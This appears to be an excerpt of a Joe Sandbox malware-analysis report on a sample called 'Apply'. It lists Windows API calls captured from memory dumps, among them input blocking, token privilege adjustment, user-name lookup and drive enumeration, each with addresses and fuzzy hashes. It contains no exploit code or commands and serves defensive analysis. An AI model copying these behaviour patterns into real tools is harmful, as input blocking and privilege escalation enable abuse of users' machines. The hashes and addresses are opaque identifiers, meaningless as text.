                                                    • GetLastError.KERNEL32(?,00000000), ref: 008CD659
                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 008CD66D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ErrorEventFileInternetLastRead
                                                    • String ID:
                                                    • API String ID: 234945975-0
                                                    • Opcode ID: aab0b5ad2ef24037657bdbeb9dd8ca6c5e670e53e247c7831cf8eec319f15e0e
                                                    • Instruction ID: 89968339538fc5040a53de48cd121e0c52e9e5fc9b57418193061adb1cf14097
                                                    • Opcode Fuzzy Hash: aab0b5ad2ef24037657bdbeb9dd8ca6c5e670e53e247c7831cf8eec319f15e0e
                                                    • Instruction Fuzzy Hash: F12190B1500708ABD720AF65D988FAAB7F8FB50318F10442EE64AD6151E774EA45CB94
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 008C5949
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 008C59A7
                                                    • SetErrorMode.KERNEL32(00000000), ref: 008C5A10
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID:
                                                    • API String ID: 1682464887-0
                                                    • Opcode ID: 9ae775283c761eb27f4787d4c28aaa2a5048f1095026e818c20b444516bae4d1
                                                    • Instruction ID: 8796c30bddd3ca9afff355408bb908c56d866fad5cf7ff5417d545d57955c6aa
                                                    • Opcode Fuzzy Hash: 9ae775283c761eb27f4787d4c28aaa2a5048f1095026e818c20b444516bae4d1
                                                    • Instruction Fuzzy Hash: CB311875A10618AFDB00DF58D884FADBBB4FF48318F148099E8459B252DB71E85ACB91
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,0087500E,?,009198A8,0000000C,00875165,?,00000002,00000000), ref: 00875059
                                                    • TerminateProcess.KERNEL32(00000000,?,0087500E,?,009198A8,0000000C,00875165,?,00000002,00000000), ref: 00875060
                                                    • ExitProcess.KERNEL32 ref: 00875072
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: 82729a22a9c3c3357dd837ad695b2090a8be7423e4b630ac5d00e355e2dc103c
                                                    • Instruction ID: c85a3b395d1269b96230026571065198d54f035385f0598ff5aa0b1b8b32b9a3
                                                    • Opcode Fuzzy Hash: 82729a22a9c3c3357dd837ad695b2090a8be7423e4b630ac5d00e355e2dc103c
                                                    • Instruction Fuzzy Hash: ECE0B631000A88AFCF21AF54DD49A587B69FB41785F048014F8098A226DB76EE46CB91
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 008AE526
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID: X64
                                                    • API String ID: 2645101109-893830106
                                                    • Opcode ID: 8e01159f540eca50e8cdc22e98ab518bb5dbce330d3d9f06f1c035bf2df1ec6b
                                                    • Instruction ID: 6c0184f3fb573df3c0eb986d6c9013fcfd7f4daf2279f6035fa72a998566fa3b
                                                    • Opcode Fuzzy Hash: 8e01159f540eca50e8cdc22e98ab518bb5dbce330d3d9f06f1c035bf2df1ec6b
                                                    • Instruction Fuzzy Hash: 55D0C9B881512DEACB90CB50ECC8DD9777CBB04308F144551F506E6100E73096488B10
                                                    APIs
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008B18DE), ref: 008B17B6
                                                    • CloseHandle.KERNEL32(?,?,008B18DE), ref: 008B17CB
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                    • String ID:
                                                    • API String ID: 81990902-0
                                                    • Opcode ID: 3c19d388c1f2d58ed6a3167259f87d567d083daf588109eaf58f00edf8fca5b3
                                                    • Instruction ID: 209427fa98cf00e9013eae09c03fb7753dc0770a9cc710467ff5be5a00577a01
                                                    • Opcode Fuzzy Hash: 3c19d388c1f2d58ed6a3167259f87d567d083daf588109eaf58f00edf8fca5b3
                                                    • Instruction Fuzzy Hash: 16E01A72004610EEE7252B14EC0AE7277E9FB04310B24882DF4A585474DA62AC909A10
                                                    APIs
                                                    • BlockInput.USER32(00000001), ref: 008CF244
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: BlockInput
                                                    • String ID:
                                                    • API String ID: 3456056419-0
                                                    • Opcode ID: 3c9620897669103c390e9a856413e7a13f2a31df8be62f4056b53d8ad9bbb470
                                                    • Instruction ID: f557b80086f29cd01b2f93070f53a4f6e7e89c6d08a0ecd5e63e07d9130596f5
                                                    • Opcode Fuzzy Hash: 3c9620897669103c390e9a856413e7a13f2a31df8be62f4056b53d8ad9bbb470
                                                    • Instruction Fuzzy Hash: 2EE012362102045FD7109F59D445E56BBE9FF54764F008029FD49CB251D6B0E8458B91
                                                    APIs
                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008BE9BF
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID:
                                                    • API String ID: 2434400541-0
                                                    • Opcode ID: a003127194ddca70adc35c72bb62d89b2f8d9712243b2fc9c6dcaed0071df4ef
                                                    • Instruction ID: c97b20349010c4343c4da1c1e024e85b67dad4c0b30c0e8afa174d49f6f0a978
                                                    • Opcode Fuzzy Hash: a003127194ddca70adc35c72bb62d89b2f8d9712243b2fc9c6dcaed0071df4ef
                                                    • Instruction Fuzzy Hash: CAD052B22A0B003CEDAC0A3C9D6FFF60E09F702B44F808349F542C9BD5E481E80CA022
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 008D32B7
                                                    • DeleteObject.GDI32(00000000), ref: 008D32CA
                                                    • DestroyWindow.USER32 ref: 008D32D9
                                                    • GetDesktopWindow.USER32 ref: 008D32F4
                                                    • GetWindowRect.USER32(00000000), ref: 008D32FB
                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 008D342A
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 008D3438
                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D347F
                                                    • GetClientRect.USER32(00000000,?), ref: 008D348B
                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 008D34C7
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D34E9
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D34FC
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D3507
                                                    • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D3510
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D351F
                                                    • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D3528
                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D352F
                                                    • GlobalFree.KERNEL32(00000000), ref: 008D353A
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D354C
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,008F0C20,00000000), ref: 008D3562
                                                    • GlobalFree.KERNEL32(00000000), ref: 008D3572
                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 008D3598
                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 008D35B7
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D35D9
                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D37C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                    • API String ID: 2211948467-2373415609
                                                    • Opcode ID: a587b2d197d4fa53febca3fe2e0cfb02805057e952e622434038d347b0a59f97
                                                    • Instruction ID: adec8aa93722786f402621a3ff833467caea67c9278a01c69a7dcdc7565b35ef
                                                    • Opcode Fuzzy Hash: a587b2d197d4fa53febca3fe2e0cfb02805057e952e622434038d347b0a59f97
                                                    • Instruction Fuzzy Hash: 90026B71900208AFDB14DF64DD89EAE7BB9FB48710F048259F915EB2A0DB74AD05CB61
                                                    APIs
                                                    • SetTextColor.GDI32(?,00000000), ref: 008E77FA
                                                    • GetSysColorBrush.USER32(0000000F), ref: 008E782B
                                                    • GetSysColor.USER32(0000000F), ref: 008E7837
                                                    • SetBkColor.GDI32(?,000000FF), ref: 008E7851
                                                    • SelectObject.GDI32(?,?), ref: 008E7860
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 008E788B
                                                    • GetSysColor.USER32(00000010), ref: 008E7893
                                                    • CreateSolidBrush.GDI32(00000000), ref: 008E789A
                                                    • FrameRect.USER32(?,?,00000000), ref: 008E78A9
                                                    • DeleteObject.GDI32(00000000), ref: 008E78B0
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 008E78FB
                                                    • FillRect.USER32(?,?,?), ref: 008E792D
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 008E794F
                                                      • Part of subcall function 008E7AB3: GetSysColor.USER32(00000012), ref: 008E7AEC
                                                      • Part of subcall function 008E7AB3: SetTextColor.GDI32(?,?), ref: 008E7AF0
                                                      • Part of subcall function 008E7AB3: GetSysColorBrush.USER32(0000000F), ref: 008E7B06
                                                      • Part of subcall function 008E7AB3: GetSysColor.USER32(0000000F), ref: 008E7B11
                                                      • Part of subcall function 008E7AB3: GetSysColor.USER32(00000011), ref: 008E7B2E
                                                      • Part of subcall function 008E7AB3: CreatePen.GDI32(00000000,00000001,00743C00), ref: 008E7B3C
                                                      • Part of subcall function 008E7AB3: SelectObject.GDI32(?,00000000), ref: 008E7B4D
                                                      • Part of subcall function 008E7AB3: SetBkColor.GDI32(?,00000000), ref: 008E7B56
                                                      • Part of subcall function 008E7AB3: SelectObject.GDI32(?,?), ref: 008E7B63
                                                      • Part of subcall function 008E7AB3: InflateRect.USER32(?,000000FF,000000FF), ref: 008E7B82
                                                      • Part of subcall function 008E7AB3: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008E7B99
                                                      • Part of subcall function 008E7AB3: GetWindowLongW.USER32(00000000,000000F0), ref: 008E7BA6
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                    • String ID:
                                                    • API String ID: 4124339563-0
                                                    • Opcode ID: 1a9042a0b7b4c76ebf5e1b576154ca7642b922e296d136eec66598ba91db79e3
                                                    • Instruction ID: 9618df7cefd56add0e28dd20bd87fdbbdb79c8cda91701c415199f58e2f9cc15
                                                    • Opcode Fuzzy Hash: 1a9042a0b7b4c76ebf5e1b576154ca7642b922e296d136eec66598ba91db79e3
                                                    • Instruction Fuzzy Hash: B8A19D72008391FFD7009F64DC88A6BBBA9FF49324F100A29FA62DA1E1D775D948DB51
                                                    APIs
                                                    • DestroyWindow.USER32(?,?), ref: 00869139
                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 008A716B
                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 008A71A4
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 008A75E9
                                                      • Part of subcall function 00869287: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00868F0D,?,00000000,?,?,?,?,00868EDF,00000000,?), ref: 008692EA
                                                    • SendMessageW.USER32(?,00001053), ref: 008A7625
                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 008A763C
                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 008A7652
                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 008A765D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                    • String ID: 0
                                                    • API String ID: 2760611726-4108050209
                                                    • Opcode ID: cf1a3367d0cd9d54fe07d7b2e1866392d774a71ecda3866043ae7df3fcd3f587
                                                    • Instruction ID: 247e7e21aac29c67cf71ca7eacede54df85334ddea8cf7701181d66302478e5f
                                                    • Opcode Fuzzy Hash: cf1a3367d0cd9d54fe07d7b2e1866392d774a71ecda3866043ae7df3fcd3f587
                                                    • Instruction Fuzzy Hash: 1312D134608242EFEB25CF18CC88BA5B7F5FB46314F254469F495CB6A1C731E886EB91
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 008D2EC5
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008D2FF1
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 008D3030
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 008D3040
                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 008D3087
                                                    • GetClientRect.USER32(00000000,?), ref: 008D3093
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 008D30DC
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008D30EB
                                                    • GetStockObject.GDI32(00000011), ref: 008D30FB
                                                    • SelectObject.GDI32(00000000,00000000), ref: 008D30FF
                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 008D310F
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008D3118
                                                    • DeleteDC.GDI32(00000000), ref: 008D3121
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008D314D
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 008D3164
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 008D31A4
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 008D31B8
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 008D31C9
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 008D31FE
                                                    • GetStockObject.GDI32(00000011), ref: 008D3209
                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008D3214
                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 008D321E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: b16e98cc8f0e8000c23c92a94e7800e37dd7d922c69460817b3b259b5e1e8c75
                                                    • Instruction ID: 47f05f3afe1ba25999487562a9fc0883aa466db5570936233349a9c5d11f4449
                                                    • Opcode Fuzzy Hash: b16e98cc8f0e8000c23c92a94e7800e37dd7d922c69460817b3b259b5e1e8c75
                                                    • Instruction Fuzzy Hash: 36B14C71A10205AFDB24DFA8DC86FAE7BB9FB48710F008615F914EB290CB74AD45CB94
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 008C525C
                                                    • GetDriveTypeW.KERNEL32(?,008EDB28,?,\\.\,008EDC1C), ref: 008C5339
                                                    • SetErrorMode.KERNEL32(00000000,008EDB28,?,\\.\,008EDC1C), ref: 008C54A5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                    • API String ID: 2907320926-4222207086
                                                    • Opcode ID: f05a4b71a478986605ca0f03b27ebda97af079152cb21f4c4759177a2c7ad7a7
                                                    • Instruction ID: 5b8609e4804039cff7abae2839d9f46bc0900f53d655dd9774bb22d1affbcfa2
                                                    • Opcode Fuzzy Hash: f05a4b71a478986605ca0f03b27ebda97af079152cb21f4c4759177a2c7ad7a7
                                                    • Instruction Fuzzy Hash: 5B618EB4704A0D9ACF18DB68C981FA9B7B1FF4530AB248059A406EB391DA71FDC5C746
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 008E6C93
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 008E6D4C
                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 008E6D68
                                                    • GetMenuItemInfoW.USER32(?,00000030,00000000,?), ref: 008E6DB9
                                                    • SetMenuItemInfoW.USER32(?,00000030,00000000,00000030), ref: 008E6E14
                                                    • GetMenuItemInfoW.USER32(00000200,00000030,00000000,00000030), ref: 008E6E37
                                                    • SetMenuDefaultItem.USER32(00000200,?,00000000), ref: 008E6E53
                                                    • DrawMenuBar.USER32(?), ref: 008E6E5F
                                                    • SendMessageW.USER32(00000466,00000466,00000000,00000000), ref: 008E6EE1
                                                    • SendMessageW.USER32(000000F1,000000F1,?,00000000), ref: 008E702F
                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 008E7053
                                                    • GetFocus.USER32 ref: 008E7059
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,?), ref: 008E7114
                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 008E7127
                                                    • EnableWindow.USER32(00000000,00000000), ref: 008E715E
                                                    • EnableWindow.USER32(00000001,00000001), ref: 008E717A
                                                    • ShowWindow.USER32(00000010,00000000), ref: 008E71F0
                                                    • ShowWindow.USER32(?,00000004), ref: 008E7206
                                                    • EnableWindow.USER32(?,00000001), ref: 008E721F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$Menu$Item$EnableInfo$Show$DefaultDrawFocusMove
                                                    • String ID: 0
                                                    • API String ID: 1429628313-4108050209
                                                    • Opcode ID: 4b5d26239616b756fba6ef6f2ec9fbd53ce38ce22006b4dd32479a475def5068
                                                    • Instruction ID: 4f7f7bdf1a6337683150c76f30fb6dc58b63e61acc2862be46a801132de07eb5
                                                    • Opcode Fuzzy Hash: 4b5d26239616b756fba6ef6f2ec9fbd53ce38ce22006b4dd32479a475def5068
